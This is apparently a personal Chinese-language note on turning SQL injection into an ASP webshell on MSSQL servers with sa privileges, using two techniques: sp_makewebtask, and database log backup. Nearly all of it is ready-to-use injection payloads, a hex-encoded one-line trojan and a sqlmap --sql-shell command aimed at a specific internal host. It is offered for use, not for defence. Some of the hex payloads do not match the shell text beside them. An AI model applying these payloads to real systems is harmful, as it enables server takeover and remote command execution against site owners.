兩種方法:
方法一:sa權限makewebbtack寫入
要求:1.必須知道網站物理路徑(網站存放的目錄)
2.必須有足夠大的權限(db以上有列目錄的權限)
3.最好是mssql2000 2005
4.開啟了makewebbtack寫入功能
1.進行sql注入,查看當前庫(nmgeip),以及權限(sa)

2.找到物理路徑(C:/nmgeip)

另一種 列目錄方法:用sqlmap加參數--os-cmd"命令"
3.sa權限,通過makewebtask,寫入一句話
手動sql注入
';exec sp_makewebtask 'c:\nmgeip\nmg.asp',' select ''<%25execute(request("a"))%25>'' ';--
方法二:sa權限 log日志備份上傳webshell
條件:1.網站物理路徑
2.數據庫名稱
3.權限夠大
第一步:
;alter database nmgeip set RECOVERY FULL--
第二步:
create table cmd (a image)--
第三步:
backup log alsm_web_cms to disk = 'D:\cmd' with init--
第四步:
insert into cmd (a) values (0x3C256576616C20726571756573742822332229253E)--
一句話木馬:<%execute request("3")%>
hex:0x3C256578656375746520726571756573742822736372697074626F792229253E
第五步:
backup log nmgeip to disk = 'c:\nmgeip\w.asa'--
第六步:
drop table cmd--
以上操作也可以這么實現:
C:\Users\命運\Desktop\安全\sqlmap\sqlmapproject-sqlmap-6ec6e86>python sqlmap.py -u "http://10.6.1.54:82/Info/InfoDetail.aspx?id=485" --sql-shell
